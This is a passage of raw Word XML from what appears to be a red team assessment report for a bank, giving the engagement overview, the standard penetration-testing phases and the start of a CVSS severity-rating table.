        <w:t xml:space="preserve"> Reserve Bank conducts these tests annually to ensure compliance with international guidelines and to ensure that the infrastructure is properly secured.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127085AB" w14:textId="77777777" w:rsidR="00A04586" w:rsidRPr="00A04586" w:rsidRDefault="00A04586" w:rsidP="0082228B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="707DECA8" w14:textId="71034E80" w:rsidR="00A04586" w:rsidRPr="00A04586" w:rsidRDefault="00A04586" w:rsidP="00A04586">
      <w:pPr>
        <w:pStyle w:val="Heading1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2" w:name="_Toc136520518"/>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Section 3. Assessment Overview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="0A7DC1B2" w14:textId="07DC3F9E" w:rsidR="00A04586" w:rsidRPr="00A04586" w:rsidRDefault="00A04586" w:rsidP="00A04586">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="120"/>
        <w:ind w:left="239"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Trimento</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Reserve Bank, on the date of the 25</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> May 2023 approached RT4U with the request to complete a full red team assessment of it’s entire infrastructure environment. The end goal was to assess if a compromise of it’s corporate division could lead to a full compromise and access to their internal banking system (Swift) to complete an unauthorized transfer of money between two different accounts.  This assessment took place between the 28</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> of May to the 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>st</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> of June of 2023. All testing is based on the OWASP top 10 and most common attack paths for Active Directory. Below you will find a list of phases within a penetration test which may be referenced later in this document.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D27A984" w14:textId="6CCC0B6C" w:rsidR="00A04586" w:rsidRPr="00A04586" w:rsidRDefault="00A04586" w:rsidP="00A04586">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="120"/>
        <w:ind w:left="239"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Phases</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>of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</w:rPr>
        <w:t>penetration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</w:rPr>
        <w:t>testing</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>activities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</w:rPr>
        <w:t>include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</w:rPr>
        <w:t>the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  <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>following:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159EE05B" w14:textId="77777777" w:rsidR="00A04586" w:rsidRPr="00A04586" w:rsidRDefault="00A04586" w:rsidP="00A04586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20" w:line="293" w:lineRule="exact"/>
        <w:ind w:hanging="361"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Planning</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:spacing w:val="-7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–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Customer</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:spacing w:val="-3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goals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are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gathered</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:spacing w:val="-3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and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rules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of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engagement</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>obtained.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B11CDC4" w14:textId="77777777" w:rsidR="00A04586" w:rsidRPr="00A04586" w:rsidRDefault="00A04586" w:rsidP="00A04586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649"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Discovery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–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Perform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scanning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and</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:spacing w:val="-3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enumeration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to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identify</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:spacing w:val="-6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potential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vulnerabilities,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weak areas, and exploits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450F8F5A" w14:textId="77777777" w:rsidR="00A04586" w:rsidRPr="00A04586" w:rsidRDefault="00A04586" w:rsidP="00A04586">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="958"/>
          <w:tab w:val="left" w:pos="959"/>
        </w:tabs>
        <w:ind w:left="958" w:right="1057"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Attack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–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Confirm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potential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vulnerabilities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through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exploitation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and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perform</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:spacing w:val="-8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additional discovery upon new access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FB3D8D" w14:textId="77777777" w:rsidR="00A04586" w:rsidRPr="00A04586" w:rsidRDefault="00A04586" w:rsidP="00A04586">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="958"/>
          <w:tab w:val="left" w:pos="959"/>
        </w:tabs>
        <w:ind w:left="958" w:right="478"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Reporting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–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Document</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:spacing w:val="-3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all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found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vulnerabilities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and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exploits,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failed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attempts,</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:spacing w:val="-4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and</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>company strengths and weaknesses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A1E949" w14:textId="77777777" w:rsidR="00A04586" w:rsidRPr="00A04586" w:rsidRDefault="00A04586" w:rsidP="00A04586">
      <w:pPr>
        <w:pStyle w:val="Heading1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3" w:name="_Toc136520519"/>
      <w:r w:rsidRPr="00A0458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Finding Severity Ratings</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="087F65B2" w14:textId="77777777" w:rsidR="00A04586" w:rsidRPr="00A04586" w:rsidRDefault="00A04586" w:rsidP="00A04586">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="273"/>
        <w:ind w:left="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>The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following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table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defines</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>levels</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>of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severity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and</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>corresponding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CVSS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>score</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:spacing w:val="25"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>range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that</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:spacing w:val="25"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>are</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:spacing w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>used throughout the document to assess vulnerability and risk impact.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6D1EC8" w14:textId="77777777" w:rsidR="00A04586" w:rsidRPr="00A04586" w:rsidRDefault="00A04586" w:rsidP="00A04586">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="10074" w:type="dxa"/>
        <w:tblInd w:w="-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620"/>
        <w:gridCol w:w="6570"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A04586" w:rsidRPr="00A04586" w14:paraId="301C940C" w14:textId="77777777" w:rsidTr="00A04586">
        <w:trPr>
          <w:trHeight w:val="539"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1884" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2C74B5"/>
          </w:tcPr>
          <w:p w14:paraId="67428C36" w14:textId="77777777" w:rsidR="00A04586" w:rsidRPr="00A04586" w:rsidRDefault="00A04586" w:rsidP="00AE10D9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="137"/>
              <w:ind w:left="149" w:right="130"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A04586">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1620" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2C74B5"/>
          </w:tcPr>
          <w:p w14:paraId="7F09DE3D" w14:textId="77777777" w:rsidR="00A04586" w:rsidRPr="00A04586" w:rsidRDefault="00A04586" w:rsidP="00AE10D9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="1" w:line="258" w:lineRule="exact"/>
              <w:ind w:left="124" w:right="106"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A04586">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>CVSS</w:t>
            </w:r>
            <w:r w:rsidRPr="00A04586">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:spacing w:val="-10"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00A04586">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:spacing w:val="-5"/>
              </w:rPr>
              <w:t>V3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="389FB635" w14:textId="77777777" w:rsidR="00A04586" w:rsidRPr="00A04586" w:rsidRDefault="00A04586" w:rsidP="00AE10D9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="258" w:lineRule="exact"/>
              <w:ind w:left="126" w:right="106"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A04586">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Score</w:t>
            </w:r>
            <w:r w:rsidRPr="00A04586">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:spacing w:val="-12"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00A04586">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>Range</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6570" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2C74B5"/>
          </w:tcPr>
          <w:p w14:paraId="621DE665" w14:textId="77777777" w:rsidR="00A04586" w:rsidRPr="00A04586" w:rsidRDefault="00A04586" w:rsidP="00AE10D9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="137"/>
              <w:ind w:left="2787" w:right="2767"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A04586">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>Definition</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A04586" w:rsidRPr="00A04586" w14:paraId="771E6324" w14:textId="77777777" w:rsidTr="00A04586">
        <w:trPr>
          <w:trHeight w:val="953"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1884" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
          </w:tcPr>
          <w:p w14:paraId="536864A7" w14:textId="77777777" w:rsidR="00A04586" w:rsidRPr="00A04586" w:rsidRDefault="00A04586" w:rsidP="00AE10D9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66EA41C4" w14:textId="77777777" w:rsidR="00A04586" w:rsidRPr="00A04586" w:rsidRDefault="00A04586" w:rsidP="00AE10D9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="150" w:right="127"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A04586">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:color w:val="FFFFFF"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1620" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43E9FA02" w14:textId="77777777" w:rsidR="00A04586" w:rsidRPr="00A04586" w:rsidRDefault="00A04586" w:rsidP="00AE10D9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31"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0228F798" w14:textId="77777777" w:rsidR="00A04586" w:rsidRPr="00A04586" w:rsidRDefault="00A04586" w:rsidP="00AE10D9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="126" w:right="102"/>
              <w:jc w:val="center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pacing w:val="-2"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>9.0-</w:t>
            </w:r>
            <w:r w:rsidRPr="00A04586">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:spacing w:val="-4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>10.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6570" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78AF4607" w14:textId="77777777" w:rsidR="00A04586" w:rsidRPr="00A04586" w:rsidRDefault="00A04586" w:rsidP="00AE10D9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="119"/>
              <w:ind w:left="114" w:right="93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z w:val="21"/>
              </w:rPr>
              <w:t>Exploitation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is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straightforward</w:t>
            </w:r>
            <w:r w:rsidRPr="00A04586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and</w:t>
            </w:r>
            <w:r w:rsidRPr="00A04586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usually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results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in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 xml:space="preserve">system-level compromise. It is advised to form a plan of action and patch </w:t>
            </w:r>
            <w:r w:rsidRPr="00A04586">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>immediately.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A04586" w:rsidRPr="00A04586" w14:paraId="1670EE95" w14:textId="77777777" w:rsidTr="00A04586">
        <w:trPr>
          <w:trHeight w:val="953"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1884" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
          </w:tcPr>
          <w:p w14:paraId="63CE62DF" w14:textId="77777777" w:rsidR="00A04586" w:rsidRPr="00A04586" w:rsidRDefault="00A04586" w:rsidP="00AE10D9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</w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7FB3FC85" w14:textId="77777777" w:rsidR="00A04586" w:rsidRPr="00A04586" w:rsidRDefault="00A04586" w:rsidP="00AE10D9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="150" w:right="130"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A04586">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:color w:val="FFFFFF"/>
                <w:spacing w:val="-4"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1620" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="36EB6FA8" w14:textId="77777777" w:rsidR="00A04586" w:rsidRPr="00A04586" w:rsidRDefault="00A04586" w:rsidP="00AE10D9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31"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="012744E5" w14:textId="77777777" w:rsidR="00A04586" w:rsidRPr="00A04586" w:rsidRDefault="00A04586" w:rsidP="00AE10D9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="126" w:right="101"/>
              <w:jc w:val="center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pacing w:val="-2"/>
                <w:sz w:val="21"/>
